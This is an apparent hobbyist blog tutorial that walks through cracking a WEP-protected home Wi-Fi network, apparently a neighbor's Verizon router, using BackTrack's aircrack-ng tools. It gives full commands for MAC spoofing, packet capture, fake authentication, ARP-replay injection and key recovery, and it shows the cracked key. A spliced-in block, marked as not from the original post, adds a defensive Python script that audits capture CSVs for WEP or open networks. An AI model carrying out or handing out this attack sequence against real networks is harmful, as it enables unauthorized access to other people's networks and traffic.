One of my favorite things to do in BackTrack is to crack a good ole Wi-Fi. It can lead to so many different options and really brings me back to my roots as to why I stumbled upon BackTrack in the first place. I guess it's just thrilling; it gives me sort of a high to be in places I shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun and exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but I do not do anything malicious to the machines I exploit. I have permission to do so. This is an Ethical Hacker's website for information and security purposes only.
I'm far from a pro hacker; I'm maybe intermediate at best. If anything looks out of the ordinary, feel free to email me with any questions or tips. I don't claim to be the best; I'm still learning. However, what I have learned thus far I'm willing to share, so here goes:
Today I'm going to demonstrate how insecure WEP encryption is over Wi-Fi. In today's world a lot of people like to set it and forget it. I'm sure most readers have heard of Verizon, a pioneer in telecom. Well, in my area Verizon offers high-speed DSL and FiOS internet. Great service most of the time. The problem is that their Westell DSL modem/Wi-Fi routers come preset to use WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon: Westell modem, WEP Wi-Fi!
Let's see what we can do!
We will be using the aircrack-ng suite (the air* tools), fun fun.
Fire up a shell and run the following commands:
1. airmon-ng
wlan1 is my interface. This varies, so yours may be different.
Next, with the interface airmon-ng has given you (wlan1 in my case), run these 4 commands:
1. airmon-ng stop wlan1 (stops monitor mode on wlan1)
2. ifconfig wlan1 down (takes wlan1 out of use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the MAC address)
4. airmon-ng start wlan1 (restarts the interface with the new MAC)
Below is what it looked like for me.
In some situations your network adapter may not be supported. I will compile a list of supported network adapters in the future, or you can google it.
I have this one:
However, if it did work, then you have successfully faked the MAC and it's time to keep on moving.
The next thing, and this is obviously important, is to pick a network. Do this by running this command:
1. airodump-ng wlan1 (MAKE SURE YOU'RE USING YOUR INTERFACE)
After you run the command, wait a few minutes to get an accurate read on what wireless networks are out there. Hit CTRL+C to stop the running application and choose a network that is using WEP.
I have the network I want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture its encrypted data frames (aircrack-ng recovers the key from the initialization vectors in those frames), writing them to a file (hackedwifi, or whatever you decide to name it).
The command is as follows:
1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
For me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1
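Besides the .cap file, the -w prefix makes airodump-ng write a (prefix)-01.csv summary of every access point it saw. As an added example (not from the original post), this Python script reads that CSV and reports each network still running WEP or no encryption at all, together with the # IV count already captured, which is how you would audit your own routers for the preset this post takes advantage of. The column header is the one airodump-ng writes (assumed to match current versions); the MACs and ESSIDs in the sample are constructed.

```python
"""Audit an airodump-ng CSV summary for access points that still run WEP or no encryption."""
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv: the
# access-point table, a blank line, then the station table. Every MAC and ESSID
# below is made up for this example; only the header names are airodump-ng's.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2012-01-01 10:00:00, 2012-01-01 10:20:00,  6,  54, WEP , WEP , , -60, 1200, 15324,   0.  0.  0.  0,  11, ExampleDSL1, 
02:00:00:00:00:02, 2012-01-01 10:00:01, 2012-01-01 10:20:00,  1,  54, WPA2, CCMP, PSK, -70,  900,     0,   0.  0.  0.  0,   8, HomeNet1, 
02:00:00:00:00:03, 2012-01-01 10:00:02, 2012-01-01 10:20:00, 11,  54, OPN , , , -80,  300,     0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:AA, 2012-01-01 10:05:00, 2012-01-01 10:20:00, -40, 14000, 02:00:00:00:00:01, 
"""

# Privacy values airodump-ng prints that a defender should treat as findings.
WEAK_PRIVACY = {"WEP": "WEP is broken; aircrack-ng recovers the key from captured IVs",
                "OPN": "open network: no encryption at all"}


def parse_access_points(text):
    """Return the access-point rows as dicts keyed by the airodump-ng column names."""
    text = text.replace("\r\n", "\n").lstrip("\n")
    ap_table = text.split("\n\n", 1)[0]          # stop at the blank line before the station table
    reader = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (v.strip() for v in row)))
            for row in reader if len(row) >= len(header)]


def weak_networks(text):
    """List (bssid, essid, channel, privacy, iv_count, reason) for every WEP or open AP."""
    findings = []
    for ap in parse_access_points(text):
        for mode in ap["Privacy"].split():       # mixed modes appear as e.g. "WPA2 WPA"
            if mode in WEAK_PRIVACY:
                findings.append((ap["BSSID"], ap["ESSID"], int(ap["channel"]),
                                 mode, int(ap["# IV"]), WEAK_PRIVACY[mode]))
                break
    return findings


if __name__ == "__main__":
    for bssid, essid, chan, mode, ivs, why in weak_networks(SAMPLE_CSV):
        print(f"{bssid}  ch{chan:>2}  {essid:<12} {mode:<4} IVs={ivs:<6} {why}")
```

Point it at your own capture by reading hackedwifi-01.csv into `weak_networks` instead of `SAMPLE_CSV`; any router of yours that shows up should be moved to WPA2.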
This is what your output should look like:
Keep in mind that rather than opening several terminals, I like to tab them using CTRL+SHIFT+T.
While you have airodump-ng running, in a separate terminal run this command:
1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
For me the command looks like this:
aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1
In most cases, and this is what you want to happen, the output says "Association successful" with a smiley face. This is good, and if you get this output you are on the right track. If not, email me and I will be happy to help you out.
Now that you are associated with the access point, we need to use aireplay-ng to generate an abundance of data on the network so we can sniff enough encrypted traffic to recover the key. Run this command:
1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
For me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1
Now it's time to wait. You will notice airodump-ng going crazy collecting data. Personally, sometimes I leave the room or go do something else for about 20 minutes. What you want is to collect enough data for the cracker. Watch the #Data column; I like to wait until it's between 10,000 and 20,000 before I run the cracker.
OK, it's been about a half hour and it's time to run the cracker. Run this command:
1. aircrack-ng -b (bssid) (filename-01.cap)
If you forgot your filename, just type "dir" and it will be the .cap file.
Mine looks like this:
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data, it will look like this:
And if you did, it will look like this:
The key to the wireless network is: 6HSKV
To prove it worked, I took a screenshot in Win7.